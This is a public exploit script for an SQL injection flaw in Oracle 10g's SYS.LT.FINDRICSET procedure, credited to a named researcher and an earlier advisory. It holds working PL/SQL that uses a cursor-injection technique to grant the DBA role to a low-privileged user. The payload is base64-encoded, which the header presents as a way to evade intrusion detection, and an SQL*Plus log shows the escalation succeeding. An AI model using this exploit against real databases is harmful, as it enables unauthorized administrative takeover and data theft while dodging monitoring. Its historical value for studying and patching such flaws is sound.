/******************************************************************/
/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/
/******************************************************************/
/*********** sploit grant DBA to scott **************/
/*********** evil cursor injection **************/
/*********** No "create procedure" privileg needed! **************/
/*********** + Funny IDS evasion vith base64 **************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: October 26, 2007 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* David Litchfield [ davidl@ngssoftware.com ] */
/* Reported: 22nd August 2006 */
/* Date of Public Advisory: October 17, 2007 */
/* Advisory number: #NISR17102007B */
/* */
/******************************************************************/
/* P.S. Special thanks David Litchfield for all his work **/
/******************************************************************/
/* you may need some tweaks to make it work with other users except skott :) */
select * from user_role_privs;
DECLARE
c2gya2Vy NUMBER;
BEGIN
c2gya2Vy := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV
Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0);
SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF');
END;
select * from user_role_privs;
-----------------------------LOG---------------------------------------------
-- -- --SQL*Plus: Release 10.1.0.2.0 - Production on Fri Oct 26 16:51:39 2007 -- --Copyright (c) 1982, 2004, Oracle. All rights reserved. -- -- --Connected to: --Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production --With the Partitioning, OLAP and Data Mining options -- -- -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> DECLARE -- 2 c2gya2Vy NUMBER; -- 3 BEGIN -- 4 c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -- 5 DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25 --vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09 --UVCc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); --6 SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql. --execute('||c2gya2Vy||')||''','DEADBEAF'); --7 END; --8 / --TGV2ZWWGMSBJB21SZXRLIDOP.U2VLLNUUBGF0ZXIP1 -- --PL/SQL procedure successfully completed. -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT DBA NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> -- -- --
// milw0rm.com [2007-10-27]